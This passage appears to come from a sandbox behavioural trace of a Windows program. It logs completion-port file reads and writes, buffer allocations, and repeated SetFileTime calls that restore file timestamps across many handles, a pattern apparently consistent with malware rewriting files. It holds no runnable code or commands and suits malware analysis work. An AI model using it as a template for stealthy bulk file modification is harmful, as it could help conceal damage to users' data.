lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0091.210] GetLastError () returned 0x3e5 [0091.210] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.232] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToWrite=0xb620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0091.236] GetLastError () returned 0x3e5 [0091.236] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.243] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0091.244] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0091.244] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0091.244] free (_Block=0x2060778) [0091.244] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0091.244] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0091.244] free (_Block=0x2062da0) [0091.244] free (_Block=0x53fcc0) [0091.244] free (_Block=0x2062eb8) [0091.244] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0091.248] GetLastError () returned 0x3e5 [0091.248] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.278] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0091.283] GetLastError () returned 0x3e5 [0091.283] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.493] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0091.574] GetLastError () returned 0x3e5 [0091.574] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.585] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0091.585] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0091.585] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0091.585] free (_Block=0x2060778) [0091.585] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0091.585] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0091.585] free (_Block=0x2062da0) [0091.585] free (_Block=0x53fcc0) [0091.586] free (_Block=0x2062eb8) [0091.586] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0091.587] GetLastError () returned 0x3e5 [0091.587] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0091.677] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0091.833] GetLastError () returned 0x3e5 [0091.833] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0095.182] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0095.186] GetLastError () returned 0x3e5 [0095.186] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0095.188] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0095.188] CloseHandle (hObject=0x3b8) returned 1 [0095.931] free (_Block=0x20abae0) [0095.931] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0096.330] SetFileTime (hFile=0x3d4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0096.330] CloseHandle (hObject=0x3d4) returned 1 [0096.331] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0096.332] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0096.332] GetLastError () returned 0x3e5 [0096.332] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0096.356] ReadFile (in: hFile=0x430, lpBuffer=0x20acf1c, nNumberOfBytesToRead=0x9d2, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8 | out: lpBuffer=0x20acf1c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8) returned 1 [0096.356] GetLastError () returned 0x3e5 [0096.356] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0096.357] SetFileTime (hFile=0x430, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0096.357] CloseHandle (hObject=0x430) returned 1 [0096.358] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0096.880] calloc (_Count=0x40, _Size=0x4) returned 0x53fd90 [0096.880] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0096.880] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd90, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0096.880] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0096.880] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0096.881] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0096.885] WriteFile (in: hFile=0x3c0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0096.885] GetLastError () returned 0x3e5 [0096.885] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0097.003] ReadFile (in: hFile=0x52c, lpBuffer=0x394007c, nNumberOfBytesToRead=0xa12, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0097.003] GetLastError () returned 0x3e5 [0097.003] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0097.004] SetFileTime (hFile=0x52c, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0097.004] CloseHandle (hObject=0x52c) returned 1 [0097.279] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0097.636] calloc (_Count=0x40, _Size=0x4) returned 0x53fd90 [0097.636] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0097.636] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd90, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0097.636] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0097.636] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0097.637] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0097.645] WriteFile (in: hFile=0x534, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0097.646] GetLastError () returned 0x3e5 [0097.646] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0097.653] calloc (_Count=0x40, _Size=0x4) returned 0x53fd90 [0097.653] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0097.653] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd90, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0097.653] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0097.653] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0097.654] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0097.654] WriteFile (in: hFile=0xac4, lpBuffer=0x20acf1c*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20acee8 | out: lpBuffer=0x20acf1c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20acee8) returned 1 [0097.654] GetLastError () returned 0x3e5 [0097.655] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0098.037] ReadFile (in: hFile=0xcf4, lpBuffer=0x394007c, nNumberOfBytesToRead=0xa44, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0098.038] GetLastError () returned 0x3e5 [0098.038] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0098.038] SetFileTime (hFile=0xcf4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0098.038] CloseHandle (hObject=0xcf4) returned 1 [0098.040] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0098.234] calloc (_Count=0x40, _Size=0x4) returned 0x53fd90 [0098.234] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0098.234] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd90, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0098.234] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0098.234] calloc (_Count=0x82, _Size=0x4) returned 0x3980cc0 [0098.235] GetQueuedCompletionStatus (CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff) Thread: id = 12 os_tid = 0xfa4 [0072.121] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0076.693] memcpy (in: _Dst=0x41cfdc, _Src=0x2ccf9a0, _Size=0x2 | out: _Dst=0x41cfdc) returned 0x41cfdc [0076.693] memcpy (in: _Dst=0x41cfde, _Src=0x2ccf96c, _Size=0x1e | out: _Dst=0x41cfde) returned 0x41cfde [0076.693] memcpy (in: _Dst=0x41cfbc, _Src=0x2ccf98a, _Size=0x2 | out: _Dst=0x41cfbc) returned 0x41cfbc [0076.693] memcpy (in: _Dst=0x41cfbc, _Src=0x2ccfa50, _Size=0x20 | out: _Dst=0x41cfbc) returned 0x41cfbc [0076.693] memcpy (in: _Dst=0x2ccf9e8, _Src=0x2ccfa50, _Size=0x20 | out: _Dst=0x2ccf9e8) returned 0x2ccf9e8 [0076.693] memcpy (in: _Dst=0x2ccfa9c, _Src=0x2ccfa50, _Size=0x20 | out: _Dst=0x2ccfa9c) returned 0x2ccfa9c [0076.693] memcpy (in: _Dst=0x2ccfabc, _Src=0x2ccfc70, _Size=0x10 | out: _Dst=0x2ccfabc) returned 0x2ccfabc [0076.693] memcpy (in: _Dst=0x2ccf890, _Src=0x2ccfa9c, _Size=0x30 | out: _Dst=0x2ccf890) returned 0x2ccf890 [0076.693] memcpy (in: _Dst=0x2ccfde8, _Src=0x41d198, _Size=0x0 | out: _Dst=0x2ccfde8) returned 0x2ccfde8 [0076.694] memcpy (in: _Dst=0x20ebb90, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb90) returned 0x20ebb90 [0076.694] memcpy (in: _Dst=0x20ebb91, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb91) returned 0x20ebb91 [0076.694] memcpy (in: _Dst=0x20ebb92, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb92) returned 0x20ebb92 [0076.694] memcpy (in: _Dst=0x20ebb93, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb93) returned 0x20ebb93 [0076.694] memcpy (in: _Dst=0x20ebb94, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb94) returned 0x20ebb94 [0076.694] memcpy (in: _Dst=0x20ebb95, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb95) returned 0x20ebb95 [0076.695] memcpy (in: _Dst=0x20ebb96, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb96) returned 0x20ebb96 [0076.695] memcpy (in: _Dst=0x20ebb97, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb97) returned 0x20ebb97 [0076.695] memcpy (in: _Dst=0x20ebb98, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb98) returned 0x20ebb98 [0076.695] memcpy (in: _Dst=0x20ebb99, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb99) returned 0x20ebb99 [0076.695] memcpy (in: _Dst=0x20ebb9a, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb9a) returned 0x20ebb9a [0076.696] memcpy (in: _Dst=0x20ebb9b, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb9b) returned 0x20ebb9b [0076.696] memcpy (in: _Dst=0x20ebb9c, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb9c) returned 0x20ebb9c [0076.696] memcpy (in: _Dst=0x20ebb9d, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb9d) returned 0x20ebb9d [0076.696] memcpy (in: _Dst=0x20ebb9e, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb9e) returned 0x20ebb9e [0076.696] memcpy (in: _Dst=0x20ebb9f, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebb9f) returned 0x20ebb9f [0076.696] memcpy (in: _Dst=0x20ebba0, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba0) returned 0x20ebba0 [0076.697] memcpy (in: _Dst=0x20ebba1, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba1) returned 0x20ebba1 [0076.697] memcpy (in: _Dst=0x20ebba2, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba2) returned 0x20ebba2 [0076.697] memcpy (in: _Dst=0x20ebba3, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba3) returned 0x20ebba3 [0076.697] memcpy (in: _Dst=0x20ebba4, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba4) returned 0x20ebba4 [0076.697] memcpy (in: _Dst=0x20ebba5, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba5) returned 0x20ebba5 [0076.698] memcpy (in: _Dst=0x20ebba6, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba6) returned 0x20ebba6 [0076.698] memcpy (in: _Dst=0x20ebba7, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba7) returned 0x20ebba7 [0076.698] memcpy (in: _Dst=0x20ebba8, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba8) returned 0x20ebba8 [0076.698] memcpy (in: _Dst=0x20ebba9, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebba9) returned 0x20ebba9 [0076.698] memcpy (in: _Dst=0x20ebbaa, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbaa) returned 0x20ebbaa [0076.699] memcpy (in: _Dst=0x20ebbab, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbab) returned 0x20ebbab [0076.699] memcpy (in: _Dst=0x20ebbac, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbac) returned 0x20ebbac [0076.699] memcpy (in: _Dst=0x20ebbad, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbad) returned 0x20ebbad [0076.699] memcpy (in: _Dst=0x20ebbae, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbae) returned 0x20ebbae [0076.699] memcpy (in: _Dst=0x20ebbaf, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbaf) returned 0x20ebbaf [0076.699] memcpy (in: _Dst=0x20ebbb0, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb0) returned 0x20ebbb0 [0076.700] memcpy (in: _Dst=0x20ebbb1, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb1) returned 0x20ebbb1 [0076.700] memcpy (in: _Dst=0x20ebbb2, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb2) returned 0x20ebbb2 [0076.700] memcpy (in: _Dst=0x20ebbb3, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb3) returned 0x20ebbb3 [0076.700] memcpy (in: _Dst=0x20ebbb4, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb4) returned 0x20ebbb4 [0076.700] memcpy (in: _Dst=0x20ebbb5, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb5) returned 0x20ebbb5 [0076.701] memcpy (in: _Dst=0x20ebbb6, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb6) returned 0x20ebbb6 [0076.701] memcpy (in: _Dst=0x20ebbb7, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb7) returned 0x20ebbb7 [0076.701] memcpy (in: _Dst=0x20ebbb8, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb8) returned 0x20ebbb8 [0076.701] memcpy (in: _Dst=0x20ebbb9, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbb9) returned 0x20ebbb9 [0076.701] memcpy (in: _Dst=0x20ebbba, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbba) returned 0x20ebbba [0076.702] memcpy (in: _Dst=0x20ebbbb, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbbb) returned 0x20ebbbb [0076.702] memcpy (in: _Dst=0x20ebbbc, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbbc) returned 0x20ebbbc [0076.702] memcpy (in: _Dst=0x20ebbbd, _Src=0x2ccfbdc, _Size=0x1 | out: _Dst=0x20ebbbd) returned 0x20ebbbd [0076.702] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0076.702] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0076.702] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0076.703] free (_Block=0x2060778) [0076.703] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0076.703] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0076.704] free (_Block=0x2062da0) [0076.704] free (_Block=0x53fcc0) [0076.705] free (_Block=0x2062eb8) [0076.706] WriteFile (in: hFile=0x3a8, lpBuffer=0x20ebb84, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 0x0 [0076.706] GetLastError () returned 0x3e5 [0076.706] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0076.732] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0076.732] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0076.732] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0076.733] free (_Block=0x2060778) [0076.733] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0076.733] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0076.734] free (_Block=0x2062da0) [0076.734] free (_Block=0x53fcc0) [0076.734] free (_Block=0x2062eb8) [0076.734] WriteFile (in: hFile=0x3a4, lpBuffer=0x20abb14, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0076.735] GetLastError () returned 0x3e5 [0076.735] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0076.748] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0076.748] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0076.748] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0076.749] free (_Block=0x2060778) [0076.749] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0076.749] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0076.750] free (_Block=0x2062da0) [0076.750] free (_Block=0x53fcc0) [0076.751] free (_Block=0x2062eb8) [0076.751] WriteFile (in: hFile=0x3ac, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0076.751] GetLastError () returned 0x3e5 [0076.751] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2ccfc4c, lpCompletionKey=0x2ccfc5c, lpOverlapped=0x2ccfc58) returned 1 [0077.340] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 